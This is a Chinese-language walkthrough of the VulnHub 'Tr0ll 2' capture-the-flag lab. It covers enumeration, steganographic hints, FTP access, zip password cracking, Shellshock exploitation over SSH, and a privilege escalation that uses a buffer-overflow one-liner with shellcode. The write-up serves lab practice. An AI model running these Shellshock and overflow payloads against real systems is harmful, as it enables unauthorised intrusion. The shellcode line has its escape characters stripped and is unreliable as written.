本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/tr0ll-2,107/
发现目标靶机IP地址是192.168.5.141,开始使用nmap对其进行扫描
通过-p-参数直接全端口扫描,发现扫描不出来,具体如下
先从80端口开始,尝试访问其web端口
查看网页源码
得知目标存在用户名为Tr0ll的可能想非常大,先放着,尝试下目录爆破
发现有robots.txt文件,直接访问看看
把这个文件robots.txt下载下来 wget http://192.168.5.141/robots.txt 然后剔除反斜杠,使用dirb进行批量尝试,挖掘可用的目录
以此访问上述4个文件,并查看其网页源码,发现这4个文件中都隐藏了相同文件名cat_the_troll.jpg的文件,依次对这些文件使用strings命令查看是否存在敏感信息,最终在如下URL发现的图片文件存在敏感信息
将此文件夹下载下来 wget http://192.168.5.141/dont_bother/cat_the_troll.jpg
根据上面提示获得存在隐藏目录y0ur_self 尝试访问看看
发现是一个文件,然后里面是base64编码的内容,下载下来然后使用base64解码
wget http://192.168.5.141/y0ur_self/answer.txt
使用 base64 -d answer.txt > bmfx.txt 进行解码,解码之后看了看里面的内容,猜测可能是字典,想了想web应用也没有登录界面需要进行暴力破解猜测的,那很有可能是开放的21端口,我们访问下21端口试试
发现登录ftp的时候提示用户名Tr0ll ,这也跟我前面猜测用户名是一致的,然后使用用户名和密码一样的方式去登录看看,发现是可以登录成功的,并且看到一个文件lmao.zip 将这个文件下载下来,然后使用unzip命令进行解压,发现需要密码
使用fcrackzip进行暴力破解密码,成功破解,密码是ItCantReallyBeThisEasyRightLOL
使用密码解压出来一个文件noob,然后查看文件类型,确认是一个密钥文件,尝试使用noob用户名去登录
发现不能登录,网上找了下原因,发现是可以通过shellshock进行利用的,相关参考链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
经过测试,最终通过下面3种形式登录成功
ssh noob@192.168.5.141 -i noob -t "() { :; }; /bin/bash"
ssh -i noob noob@192.168.5.141 -t "() { :; }; /bin/bash"
ssh -i noob 192.168.5.141 -l noob -t "() { :; }; /bin/bash"
使用find命令查看特权用户信息
find / -perm -4000 2>/dev/null
这里是二进制题目,我不擅长哈,直接从网上找到对应的exp直接提权,如果大家有兴趣,可以看看网上的文章
对应的exp
./r00t $(python -c 'print "A"*268 + "x80xfbxffxbf" + "x90"*16 + "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1xb0x0bxcdx80"')
